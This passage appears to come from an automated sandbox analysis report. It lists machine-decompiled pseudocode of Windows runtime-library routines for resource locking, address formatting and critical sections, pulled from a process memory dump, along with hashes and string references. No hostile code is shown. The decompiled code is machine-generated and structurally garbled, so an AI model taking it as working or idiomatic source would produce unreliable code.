                                                              									_t160 = _t158 + 0x28;
                                                              									__eflags = _t130 - 2;
                                                              									if(__eflags > 0) {
                                                              										E01F4217A(_t106, __eflags, _t96);
                                                              									}
                                                              									_push("RTL: Re-Waiting\n");
                                                              									_push(0);
                                                              									_push(0x65);
                                                              									E01F13F92();
                                                              									_t158 = _t160 + 0xc;
                                                              								}
                                                              								__eflags = _t51;
                                                              								if(__eflags < 0) {
                                                              									_push(_t51);
                                                              									E01F03915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                              									asm("int3");
                                                              									while(1) {
                                                              										L32:
                                                              										__eflags = _a8;
                                                              										if(_a8 == 0) {
                                                              											break;
                                                              										}
                                                              										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                              										_t119 = _t96 + 0x24;
                                                              										_t107 = 1;
                                                              										asm("lock xadd [eax], ecx");
                                                              										_t56 =  *(_t96 + 0x28);
                                                              										_a4 = _t56;
                                                              										__eflags = _t56;
                                                              										if(_t56 != 0) {
                                                              											L40:
                                                              											_t128 = 0;
                                                              											__eflags = 0;
                                                              											while(1) {
                                                              												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                              												asm("sbb esi, esi");
                                                              												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x01fa01c0;
                                                              												_push(_t138);
                                                              												_push(0);
                                                              												_t58 = E01EBF8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                              												__eflags = _t58 - 0x102;
                                                              												if(_t58 != 0x102) {
                                                              													break;
                                                              												}
                                                              												_t107 =  *(_t138 + 4);
                                                              												_t125 =  *_t138;
                                                              												_t75 = E01F04FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                              												_push(_t125);
                                                              												_push(_t75);
                                                              												E01F13F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                              												E01F13F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                              												_t128 = _t128 + 1;
                                                              												_t159 = _t158 + 0x28;
                                                              												__eflags = _t128 - 2;
                                                              												if(__eflags > 0) {
                                                              													E01F4217A(_t107, __eflags, _t96);
                                                              												}
                                                              												_push("RTL: Re-Waiting\n");
                                                              												_push(0);
                                                              												_push(0x65);
                                                              												E01F13F92();
                                                              												_t158 = _t159 + 0xc;
                                                              											}
                                                              											__eflags = _t58;
                                                              											if(__eflags < 0) {
                                                              												_push(_t58);
                                                              												E01F03915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                              												asm("int3");
                                                              												_t61 =  *_t107;
                                                              												 *_t107 = 0;
                                                              												__eflags = _t61;
                                                              												if(_t61 == 0) {
                                                              													L1:
                                                              													_t63 = E01EE5384(_t138 + 0x24);
                                                              													if(_t63 != 0) {
                                                              														goto L52;
                                                              													} else {
                                                              														goto L2;
                                                              													}
                                                              												} else {
                                                              													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                              													_push( &_a4);
                                                              													_push(_t61);
                                                              													_t70 = E01EBF970( *((intOrPtr*)(_t138 + 0x18)));
                                                              													__eflags = _t70;
                                                              													if(__eflags >= 0) {
                                                              														goto L1;
                                                              													} else {
                                                              														_push(_t70);
                                                              														E01F03915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                              														L52:
                                                              														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                              														_push( &_a4);
                                                              														_push(1);
                                                              														_t63 = E01EBF970( *((intOrPtr*)(_t138 + 0x20)));
                                                              														__eflags = _t63;
                                                              														if(__eflags >= 0) {
                                                              															L2:
                                                              															return _t63;
                                                              														} else {
                                                              															_push(_t63);
                                                              															E01F03915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                              															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                              															_push( &_a4);
                                                              															_push(1);
                                                              															_t63 = E01EBF970( *((intOrPtr*)(_t138 + 0x20)));
                                                              															__eflags = _t63;
                                                              															if(__eflags >= 0) {
                                                              																goto L2;
                                                              															} else {
                                                              																_push(_t63);
                                                              																_t66 = E01F03915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                              																asm("int3");
                                                              																while(1) {
                                                              																	_t110 = _t66;
                                                              																	__eflags = _t66 - 1;
                                                              																	if(_t66 != 1) {
                                                              																		break;
                                                              																	}
                                                              																	_t128 = _t128 | 0xffffffff;
                                                              																	_t66 = _t110;
                                                              																	asm("lock cmpxchg [ebx], edi");
                                                              																	__eflags = _t66 - _t110;
                                                              																	if(_t66 != _t110) {
                                                              																		continue;
                                                              																	} else {
                                                              																		_t67 =  *[fs:0x18];
                                                              																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                              																		return _t67;
                                                              																	}
                                                              																	goto L59;
                                                              																}
                                                              																E01EE5329(_t110, _t138);
                                                              																_t69 = E01EE53A5(_t138, 1);
                                                              																return _t69;
                                                              															}
                                                              														}
                                                              													}
                                                              												}
                                                              											} else {
                                                              												_t56 =  *(_t96 + 0x28);
                                                              												goto L3;
                                                              											}
                                                              										} else {
                                                              											_t107 =  *_t119;
                                                              											__eflags = _t107;
                                                              											if(__eflags > 0) {
                                                              												while(1) {
                                                              													_t81 = _t107;
                                                              													asm("lock cmpxchg [edi], esi");
                                                              													__eflags = _t81 - _t107;
                                                              													if(_t81 == _t107) {
                                                              														break;
                                                              													}
                                                              													_t107 = _t81;
                                                              													__eflags = _t81;
                                                              													if(_t81 > 0) {
                                                              														continue;
                                                              													}
                                                              													break;
                                                              												}
                                                              												_t56 = _a4;
                                                              												__eflags = _t107;
                                                              											}
                                                              											if(__eflags != 0) {
                                                              												while(1) {
                                                              													L3:
                                                              													__eflags = _t56;
                                                              													if(_t56 != 0) {
                                                              														goto L32;
                                                              													}
                                                              													_t107 = _t107 | 0xffffffff;
                                                              													_t56 = 0;
                                                              													asm("lock cmpxchg [edx], ecx");
                                                              													__eflags = 0;
                                                              													if(0 != 0) {
                                                              														continue;
                                                              													} else {
                                                              														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                              														return 1;
                                                              													}
                                                              													goto L59;
                                                              												}
                                                              												continue;
                                                              											} else {
                                                              												goto L40;
                                                              											}
                                                              										}
                                                              										goto L59;
                                                              									}
                                                              									__eflags = 0;
                                                              									return 0;
                                                              								} else {
                                                              									_t115 =  *(_t96 + 0x28);
                                                              									continue;
                                                              								}
                                                              							} else {
                                                              								_t106 =  *_t49;
                                                              								__eflags = _t106;
                                                              								if(__eflags > 0) {
                                                              									while(1) {
                                                              										_t93 = _t106;
                                                              										asm("lock cmpxchg [edi], esi");
                                                              										__eflags = _t93 - _t106;
                                                              										if(_t93 == _t106) {
                                                              											break;
                                                              										}
                                                              										_t106 = _t93;
                                                              										__eflags = _t93;
                                                              										if(_t93 > 0) {
                                                              											continue;
                                                              										}
                                                              										break;
                                                              									}
                                                              									__eflags = _t106;
                                                              								}
                                                              								if(__eflags != 0) {
                                                              									continue;
                                                              								} else {
                                                              									goto L23;
                                                              								}
                                                              							}
                                                              						}
                                                              						goto L59;
                                                              					}
                                                              					_t84 = _t115;
                                                              					asm("lock cmpxchg [esi], ecx");
                                                              					__eflags = _t84 - _t115;
                                                              					if(_t84 != _t115) {
                                                              						_t115 = _t84;
                                                              						goto L7;
                                                              					} else {
                                                              						return 1;
                                                              					}
                                                              				}
                                                              				L59:
                                                              			}




































                                                              0x01f19160
                                                              0x00000000
                                                              0x01f19166
                                                              0x01f19166
                                                              0x01f19171
                                                              0x01f19176
                                                              0x01f19176
                                                              0x00000000
                                                              0x01f19160
                                                              0x01f223c6
                                                              0x01f223ce
                                                              0x01f223d7
                                                              0x01f223d7
                                                              0x01f223ad
                                                              0x01f22390
                                                              0x01f22373
                                                              0x01f2233f
                                                              0x01f2233f
                                                              0x00000000
                                                              0x01f2233f
                                                              0x01f22291
                                                              0x01f22291
                                                              0x01f22293
                                                              0x01f22295
                                                              0x01f2229a
                                                              0x01f222a1
                                                              0x01f222a3
                                                              0x01f222a7
                                                              0x01f222a9
                                                              0x00000000
                                                              0x00000000
                                                              0x01f222ab
                                                              0x01f222ad
                                                              0x01f222af
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x01f222af
                                                              0x01f222b1
                                                              0x01f222b4
                                                              0x01f222b4
                                                              0x01f222b6
                                                              0x01ee53be
                                                              0x01ee53be
                                                              0x01ee53be
                                                              0x01ee53c0
                                                              0x00000000
                                                              0x00000000
                                                              0x01ee53cb
                                                              0x01ee53ce
                                                              0x01ee53d0
                                                              0x01ee53d4
                                                              0x01ee53d6
                                                              0x00000000
                                                              0x01ee53d8
                                                              0x01ee53e3
                                                              0x01ee53ea
                                                              0x01ee53ea
                                                              0x00000000
                                                              0x01ee53d6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x01f222b6
                                                              0x00000000
                                                              0x01f2228f
                                                              0x01f22349
                                                              0x01f2234d
                                                              0x01f22251
                                                              0x01f22251
                                                              0x00000000
                                                              0x01f22251
                                                              0x01f221a4
                                                              0x01f221a4
                                                              0x01f221a6
                                                              0x01f221a8
                                                              0x01f221ac
                                                              0x01f221b6
                                                              0x01f221b8
                                                              0x01f221bc
                                                              0x01f221be
                                                              0x00000000
                                                              0x00000000
                                                              0x01f221c0
                                                              0x01f221c2
                                                              0x01f221c4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x01f221c4
                                                              0x01f221c6
                                                              0x01f221c6
                                                              0x01f221c8
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x01f221c8
                                                              0x01f221a2
                                                              0x00000000
                                                              0x01f22183
                                                              0x01f0057b
                                                              0x01f0057d
                                                              0x01f00581
                                                              0x01f00583
                                                              0x01f22178
                                                              0x00000000
                                                              0x01f00589
                                                              0x01f0058f
                                                              0x01f0058f
                                                              0x01f00583
                                                              0x00000000

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01F22206
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-4236105082
                                                              • Opcode ID: 776ca66a4ffd9ca4ee43b6e64642fd2901141f32e3affef4b93b9b966d21a4ba
                                                              • Instruction ID: 1e1038bc1d5cadf5e91f5572137b1553332d9f9746f829c436d81a66c14d043e
                                                              • Opcode Fuzzy Hash: 776ca66a4ffd9ca4ee43b6e64642fd2901141f32e3affef4b93b9b966d21a4ba
                                                              • Instruction Fuzzy Hash: B8512B35B00222ABEB15CA1DDC81FA673A9AFD5720F21421DFD55DB2C9DA33EC428790
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 64%
                                                              			E01F014C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                              				signed int _v8;
                                                              				char _v10;
                                                              				char _v140;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t24;
                                                              				void* _t26;
                                                              				signed int _t29;
                                                              				signed int _t34;
                                                              				signed int _t40;
                                                              				intOrPtr _t45;
                                                              				void* _t51;
                                                              				intOrPtr* _t52;
                                                              				void* _t54;
                                                              				signed int _t57;
                                                              				void* _t58;
                                                              
                                                              				_t51 = __edx;
                                                              				_t24 =  *0x1fa2088; // 0x745fb394
                                                              				_v8 = _t24 ^ _t57;
                                                              				_t45 = _a16;
                                                              				_t53 = _a4;
                                                              				_t52 = _a20;
                                                              				if(_a4 == 0 || _t52 == 0) {
                                                              					L10:
                                                              					_t26 = 0xc000000d;
                                                              				} else {
                                                              					if(_t45 == 0) {
                                                              						if( *_t52 == _t45) {
                                                              							goto L3;
                                                              						} else {
                                                              							goto L10;
                                                              						}
                                                              					} else {
                                                              						L3:
                                                              						_t28 =  &_v140;
                                                              						if(_a12 != 0) {
                                                              							_push("[");
                                                              							_push(0x41);
                                                              							_push( &_v140);
                                                              							_t29 = E01EF7707();
                                                              							_t58 = _t58 + 0xc;
                                                              							_t28 = _t57 + _t29 * 2 - 0x88;
                                                              						}
                                                              						_t54 = E01F013CB(_t53, _t28);
                                                              						if(_a8 != 0) {
                                                              							_t34 = E01EF7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                              							_t58 = _t58 + 0x10;
                                                              							_t54 = _t54 + _t34 * 2;
                                                              						}
                                                              						if(_a12 != 0) {
                                                              							_t40 = E01EF7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                              							_t58 = _t58 + 0x10;
                                                              							_t54 = _t54 + _t40 * 2;
                                                              						}
                                                              						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                              						 *_t52 = _t53;
                                                              						if( *_t52 < _t53) {
                                                              							goto L10;
                                                              						} else {
                                                              							E01EC2340(_t45,  &_v140, _t53 + _t53);
                                                              							_t26 = 0;
                                                              						}
                                                              					}
                                                              				}
                                                              				return E01ECE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                              			}





















                                                              APIs
                                                              • ___swprintf_l.LIBCMT ref: 01F2EA22
                                                                • Part of subcall function 01F013CB: ___swprintf_l.LIBCMT ref: 01F0146B
                                                                • Part of subcall function 01F013CB: ___swprintf_l.LIBCMT ref: 01F01490
                                                              • ___swprintf_l.LIBCMT ref: 01F0156D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: d4ce5fec15419ee9109ddea44788489f6df361f841beb52175bcbe6ca0a70ea6
                                                              • Instruction ID: b8fec63dcaf66e06fb6b1f3d5f0b701fc8d4b2e3cd77cc0235f6c93a22616211
                                                              • Opcode Fuzzy Hash: d4ce5fec15419ee9109ddea44788489f6df361f841beb52175bcbe6ca0a70ea6
                                                              • Instruction Fuzzy Hash: AA21F772D0021ADBDB22DF58CC00AFF77ACAB90704F484019ED46E7181DB72DA598BE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 45%
                                                              			E01EE53A5(signed int _a4, char _a8) {
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t32;
                                                              				signed int _t37;
                                                              				signed int _t40;
                                                              				signed int _t42;
                                                              				void* _t45;
                                                              				intOrPtr _t46;
                                                              				void* _t48;
                                                              				signed int _t49;
                                                              				void* _t51;
                                                              				signed int _t57;
                                                              				signed int _t64;
                                                              				signed int _t71;
                                                              				void* _t74;
                                                              				intOrPtr _t78;
                                                              				signed int* _t79;
                                                              				void* _t85;
                                                              				signed int _t86;
                                                              				signed int _t92;
                                                              				void* _t104;
                                                              				void* _t105;
                                                              
                                                              				_t64 = _a4;
                                                              				_t32 =  *(_t64 + 0x28);
                                                              				_t71 = _t64 + 0x28;
                                                              				_push(_t92);
                                                              				if(_t32 < 0) {
                                                              					_t78 =  *[fs:0x18];
                                                              					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                              					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                              						goto L3;
                                                              					} else {
                                                              						__eflags = _t32 | 0xffffffff;
                                                              						asm("lock xadd [ecx], eax");
                                                              						return 1;
                                                              					}
                                                              				} else {
                                                              					L3:
                                                              					_push(_t86);
                                                              					while(1) {
                                                              						L4:
                                                              						__eflags = _t32;
                                                              						if(_t32 == 0) {
                                                              							break;
                                                              						}
                                                              						__eflags = _a8;
                                                              						if(_a8 == 0) {
                                                              							__eflags = 0;
                                                              							return 0;
                                                              						} else {
                                                              							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                              							_t79 = _t64 + 0x24;
                                                              							_t71 = 1;
                                                              							asm("lock xadd [eax], ecx");
                                                              							_t32 =  *(_t64 + 0x28);
                                                              							_a4 = _t32;
                                                              							__eflags = _t32;
                                                              							if(_t32 != 0) {
                                                              								L19:
                                                              								_t86 = 0;
                                                              								__eflags = 0;
                                                              								while(1) {
                                                              									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                              									asm("sbb esi, esi");
                                                              									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x01fa01c0;
                                                              									_push(_t92);
                                                              									_push(0);
                                                              									_t37 = E01EBF8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                              									__eflags = _t37 - 0x102;
                                                              									if(_t37 != 0x102) {
                                                              										break;
                                                              									}
                                                              									_t71 =  *(_t92 + 4);
                                                              									_t85 =  *_t92;
                                                              									_t51 = E01F04FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                              									_push(_t85);
                                                              									_push(_t51);
                                                              									E01F13F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                              									E01F13F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                              									_t86 = _t86 + 1;
                                                              									_t105 = _t104 + 0x28;
                                                              									__eflags = _t86 - 2;
                                                              									if(__eflags > 0) {
                                                              										E01F4217A(_t71, __eflags, _t64);
                                                              									}
                                                              									_push("RTL: Re-Waiting\n");
                                                              									_push(0);
                                                              									_push(0x65);
                                                              									E01F13F92();
                                                              									_t104 = _t105 + 0xc;
                                                              								}
                                                              								__eflags = _t37;
                                                              								if(__eflags < 0) {
                                                              									_push(_t37);
                                                              									E01F03915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                              									asm("int3");
                                                              									_t40 =  *_t71;
                                                              									 *_t71 = 0;
                                                              									__eflags = _t40;
                                                              									if(_t40 == 0) {
                                                              										L1:
                                                              										_t42 = E01EE5384(_t92 + 0x24);
                                                              										if(_t42 != 0) {
                                                              											goto L31;
                                                              										} else {
                                                              											goto L2;
                                                              										}
                                                              									} else {
                                                              										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                              										_push( &_a4);
                                                              										_push(_t40);
                                                              										_t49 = E01EBF970( *((intOrPtr*)(_t92 + 0x18)));
                                                              										__eflags = _t49;
                                                              										if(__eflags >= 0) {
                                                              											goto L1;
                                                              										} else {
                                                              											_push(_t49);
                                                              											E01F03915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                              											L31:
                                                              											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                              											_push( &_a4);
                                                              											_push(1);
                                                              											_t42 = E01EBF970( *((intOrPtr*)(_t92 + 0x20)));
                                                              											__eflags = _t42;
                                                              											if(__eflags >= 0) {
                                                              												L2:
                                                              												return _t42;
                                                              											} else {
                                                              												_push(_t42);
                                                              												E01F03915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                              												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                              												_push( &_a4);
                                                              												_push(1);
                                                              												_t42 = E01EBF970( *((intOrPtr*)(_t92 + 0x20)));
                                                              												__eflags = _t42;
                                                              												if(__eflags >= 0) {
                                                              													goto L2;
                                                              												} else {
                                                              													_push(_t42);
                                                              													_t45 = E01F03915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                              													asm("int3");
                                                              													while(1) {
                                                              														_t74 = _t45;
                                                              														__eflags = _t45 - 1;
                                                              														if(_t45 != 1) {
                                                              															break;
                                                              														}
                                                              														_t86 = _t86 | 0xffffffff;
                                                              														_t45 = _t74;
                                                              														asm("lock cmpxchg [ebx], edi");
                                                              														__eflags = _t45 - _t74;
                                                              														if(_t45 != _t74) {
                                                              															continue;
                                                              														} else {
                                                              															_t46 =  *[fs:0x18];
                                                              															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                              															return _t46;
                                                              														}
                                                              														goto L38;
                                                              													}
                                                              													E01EE5329(_t74, _t92);
                                                              													_push(1);
                                                              													_t48 = E01EE53A5(_t92);
                                                              													return _t48;
                                                              												}
                                                              											}
                                                              										}
                                                              									}
                                                              								} else {
                                                              									_t32 =  *(_t64 + 0x28);
                                                              									continue;
                                                              								}
                                                              							} else {
                                                              								_t71 =  *_t79;
                                                              								__eflags = _t71;
                                                              								if(__eflags > 0) {
                                                              									while(1) {
                                                              										_t57 = _t71;
                                                              										asm("lock cmpxchg [edi], esi");
                                                              										__eflags = _t57 - _t71;
                                                              										if(_t57 == _t71) {
                                                              											break;
                                                              										}
                                                              										_t71 = _t57;
                                                              										__eflags = _t57;
                                                              										if(_t57 > 0) {
                                                              											continue;
                                                              										}
                                                              										break;
                                                              									}
                                                              									_t32 = _a4;
                                                              									__eflags = _t71;
                                                              								}
                                                              								if(__eflags != 0) {
                                                              									continue;
                                                              								} else {
                                                              									goto L19;
                                                              								}
                                                              							}
                                                              						}
                                                              						goto L38;
                                                              					}
                                                              					_t71 = _t71 | 0xffffffff;
                                                              					_t32 = 0;
                                                              					asm("lock cmpxchg [edx], ecx");
                                                              					__eflags = 0;
                                                              					if(0 != 0) {
                                                              						goto L4;
                                                              					} else {
                                                              						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                              						return 1;
                                                              					}
                                                              				}
                                                              				L38:
                                                              			}



























                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01F222F4
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 01F22328
                                                              • RTL: Resource at %p, xrefs: 01F2230B
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01F222FC
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-871070163
                                                              • Opcode ID: 9030b1ca91d7373caab703923876553ddef5f38aff011300c8700d2809773c6b
                                                              • Instruction ID: 2676c316be32f98c6a33fa45c197857e5991e8ff538bb23489f86f5229c9cf54
                                                              • Opcode Fuzzy Hash: 9030b1ca91d7373caab703923876553ddef5f38aff011300c8700d2809773c6b
                                                              • Instruction Fuzzy Hash: A4513A75600712ABEB15DF28CC80FAB73E8EF55324F104219FD05DB285EA72EC428790
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 51%
                                                              			E01EEEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                              				intOrPtr _v8;
                                                              				intOrPtr _v12;
                                                              				signed int _v24;
                                                              				intOrPtr* _v28;
                                                              				intOrPtr _v32;
                                                              				signed int _v36;
                                                              				intOrPtr _v40;
                                                              				short _v66;
                                                              				char _v72;
                                                              				void* __esi;
                                                              				intOrPtr _t38;
                                                              				intOrPtr _t39;
                                                              				signed int _t40;
                                                              				intOrPtr _t42;
                                                              				intOrPtr _t43;
                                                              				signed int _t44;
                                                              				void* _t46;
                                                              				intOrPtr _t48;
                                                              				signed int _t49;
                                                              				intOrPtr _t50;
                                                              				intOrPtr _t53;
                                                              				signed char _t67;
                                                              				void* _t72;
                                                              				intOrPtr _t77;
                                                              				intOrPtr* _t80;
                                                              				intOrPtr _t84;
                                                              				intOrPtr* _t85;
                                                              				void* _t91;
                                                              				void* _t92;
                                                              				void* _t93;
                                                              
                                                              				_t80 = __edi;
                                                              				_t75 = __edx;
                                                              				_t70 = __ecx;
                                                              				_t84 = _a4;
                                                              				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                              					E01EDDA92(__ecx, __edx, __eflags, _t84);
                                                              					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                              				}
                                                              				_push(0);
                                                              				__eflags = _t38 - 0xffffffff;
                                                              				if(_t38 == 0xffffffff) {
                                                              					_t39 =  *0x1fa793c; // 0x0
                                                              					_push(0);
                                                              					_push(_t84);
                                                              					_t40 = E01EC16C0(_t39);
                                                              				} else {
                                                              					_t40 = E01EBF9D4(_t38);
                                                              				}
                                                              				_pop(_t85);
                                                              				__eflags = _t40;
                                                              				if(__eflags < 0) {
                                                              					_push(_t40);
                                                              					E01F03915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                              					asm("int3");
                                                              					while(1) {
                                                              						L21:
                                                              						_t76 =  *[fs:0x18];
                                                              						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                              						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                              						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                              							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                              							_v66 = 0x1722;
                                                              							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                              							_t76 =  &_v72;
                                                              							_push( &_v72);
                                                              							_v28 = _t85;
                                                              							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                              							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                              							_push(0x10);
                                                              							_push(0x20402);
                                                              							E01EC01A4( *0x7ffe0382 & 0x000000ff);
                                                              						}
                                                              						while(1) {
                                                              							_t43 = _v8;
                                                              							_push(_t80);
                                                              							_push(0);
                                                              							__eflags = _t43 - 0xffffffff;
                                                              							if(_t43 == 0xffffffff) {
                                                              								_t71 =  *0x1fa793c; // 0x0
                                                              								_push(_t85);
                                                              								_t44 = E01EC1F28(_t71);
                                                              							} else {
                                                              								_t44 = E01EBF8CC(_t43);
                                                              							}
                                                              							__eflags = _t44 - 0x102;
                                                              							if(_t44 != 0x102) {
                                                              								__eflags = _t44;
                                                              								if(__eflags < 0) {
                                                              									_push(_t44);
                                                              									E01F03915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                              									asm("int3");
                                                              									E01F42306(_t85);
                                                              									__eflags = _t67 & 0x00000002;
                                                              									if((_t67 & 0x00000002) != 0) {
                                                              										_t7 = _t67 + 2; // 0x4
                                                              										_t72 = _t7;
                                                              										asm("lock cmpxchg [edi], ecx");
                                                              										__eflags = _t67 - _t67;
                                                              										if(_t67 == _t67) {
                                                              											E01EEEC56(_t72, _t76, _t80, _t85);
                                                              										}
                                                              									}
                                                              									return 0;
                                                              								} else {
                                                              									__eflags = _v24;
                                                              									if(_v24 != 0) {
                                                              										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                              									}
                                                              									return 2;
                                                              								}
                                                              								goto L36;
                                                              							}
                                                              							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                              							_push(_t67);
                                                              							_t46 = E01F04FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                              							_push(_t77);
                                                              							E01F13F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                              							_t48 =  *_t85;
                                                              							_t92 = _t91 + 0x18;
                                                              							__eflags = _t48 - 0xffffffff;
                                                              							if(_t48 == 0xffffffff) {
                                                              								_t49 = 0;
                                                              								__eflags = 0;
                                                              							} else {
                                                              								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                              							}
